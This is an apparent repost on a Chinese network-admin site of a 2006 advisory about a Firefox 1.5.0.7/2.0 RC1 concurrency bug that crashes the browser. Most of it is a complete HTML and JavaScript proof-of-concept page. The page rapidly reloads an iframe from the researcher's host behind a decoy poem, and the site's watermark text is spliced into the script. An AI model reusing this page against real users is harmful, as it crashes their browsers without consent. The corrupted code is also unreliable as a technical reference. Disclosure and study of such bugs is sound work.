网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > Firefox Concurrency-Related Vulnerabilities  

Firefox Concurrency-Related Vulnerabilities

2006-10-14  作者:BitsCN整理  来源:中国网管联盟  点评 投稿 收藏


 Summary
A vulnerability in Firefox allows remote attackers to cause the browser to crash by exploiting a concurrency issue in the way the browser handlessimulations requests.
 
Credit:
The information has been provided by Michal Zalewski.
Click here to get expert advice, live
 
 Details
Vulnerable Systems:
 * Firefox version 1.5.0.7
 * Firefox version 2.0 RC1

Exploit:
<html>
<body bgcolor=black text=white onload="javascript:foo()">
<script>
<!--
counter = 0;

function foo() {
  if (counter < 50) {
  document.getElementById('foo').src = "http://lcamtuf.coredump.cx/ffoxdie3_i.html?" +Math.random();
  setTimeout('foo()',10 * counter);
  counter++;
  } else { 网管网www.bitscn.com
  document.getElementById('foo').src = "http://lcamtuf.coredump.cx/ffoxdie3_ok.html";
  }
}
// -->
</script>
<img src="http://lcamtuf.coredump.cx/photo/current/ula4-6.jpg" style="border-style: solid; border-width: 1px; border-color: #804040" align=right>
<font face="tahoma, helvetica, arial">
<font color=lightblue>
Tyger, Tyger. burning bright<br>
In the forests of the night,<br>
What immortal hand or eye<br>
Could frame thy fearful symmetry?
</font>
<p>
<b>Please wait approx. 20 seconds...</b>
<br>
<iframe id=foo>
</iframe>
<p>
<font color=gray>
Javascript is required.<br>
Firefox is required.<br>
May fail on a spotty link.<br>
Common sense is advised.<br>
<p>
More photos: <a href=/photo/current/>click here</a> 网管联盟bitsCN_com
</font>
</font>
</body>
</html>

TAGs     the   foo   Firefox   counter   font   to   is   /font   color   br      
 上一篇:SHTTPD POST Remote Buffer Overflow   下一篇:OpenSSH Pre-Authentication CRC32 DoS
Firefox Concurrency-Related Vulnerabilities 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: